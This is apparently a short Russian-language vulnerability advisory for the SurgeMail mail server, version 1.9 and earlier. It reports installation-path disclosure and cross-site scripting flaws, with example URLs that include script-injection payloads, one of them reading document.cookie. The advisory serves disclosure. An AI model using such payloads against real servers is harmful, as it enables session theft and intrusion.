Программа: SurgeMail 1.9 и более ранние версии 

Несколько уязвимостей обнаружено в SurgeMail. Удаленный пользователь может определить инсталляционный путь. Удаленный пользователь может выполнить XSS нападение. 

1. Раскрытие пути: 

http://x.x.x.x:7080/scripts/
http://x.x.x.x:7080/scripts/err.txt

2. XSS:

http://x.x.x.x:7080/<script>alert('Vulnerable')</script>
http://x.x.x.x:7080/<script>alert(document.cookie)</script>

Оставить мнение